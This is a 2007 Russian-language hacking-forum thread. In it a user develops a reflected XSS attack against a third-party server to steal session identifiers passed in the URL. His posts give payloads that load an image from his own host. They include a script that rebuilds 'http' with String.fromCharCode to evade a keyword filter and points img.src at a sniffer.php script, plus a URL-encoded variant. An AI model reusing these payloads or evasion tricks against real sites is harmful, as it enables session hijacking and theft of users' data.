Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   Протиснуться через пассивную Xss (https://forum.antichat.xyz/showthread.php?t=43529)

Alexus 02.07.2007 14:37

Протиснуться через пассивную Xss
 
Извиняюсь за возможно лёгкий вопрос заранее.
Нашёл в одном из интересующих менЯ серверов пассивную XSS, coockie сервер не использует , да они мне и ненужны , тк данные сесии идут через адресную строку get запросом в переменной $a. ХSS не имеет ограничений по количеству символов . Я решил , что если сделать в XSS так <img src=http://******> то браузер обратится к моему серверу и я получу значение refer . Но скрипт каким-то образом фильтрует слово http((( однако на ftp спокойно пустил(<img src=ftp://*****>).Я пробовал смотреть логи Golden Ftp Server , но там нет , использовал FTP сервер встроеный в Small http Server . Но там тоже этого не нашёл . Пожалуйста подскажите или какой-нибудь другой способ или ftp сервер пишущий в лог поле рефер .

Alexus 02.07.2007 14:53

Тег создаю сам , как я вставлю ссылку на сниффер через http если слово блокируется в переменной
-------------------
http://***.*****.ru/m/a="то что мне надо"&INi=26&v="сдесь xss"

Alexus 02.07.2007 15:17

Проверил , заметил , "+" тоже фильтруется (((

Alexus 02.07.2007 15:27

вот что у меня получается в исходном коде , он фильтрует все плюсы и везде : (уровень <script>img=new/**/Image();img.src=String.fromCharCode(6*16 8,7*16 4,7*16 4,7*16) :/*****.fatal.ru/sniff/sniffer.php;</script>)
про eval можно подробнее? xAE это в символах ASCI ?

Alexus 02.07.2007 15:49

%3Cscript%3Eimg%3Dnew%2F**%2FImage()%3Bimg.src%3DS tring.fromCharCode(6*16%2B8%2C7*16%2B4%2C7*16%2B4% 2C7*16)%2B'%3A%2F%2******.fatal.ru%2Fsniff%2Fsniff er.php'%3B%3C%2Fscript%3E
400 Bad Request
nginx/0.5.25


Время: 19:37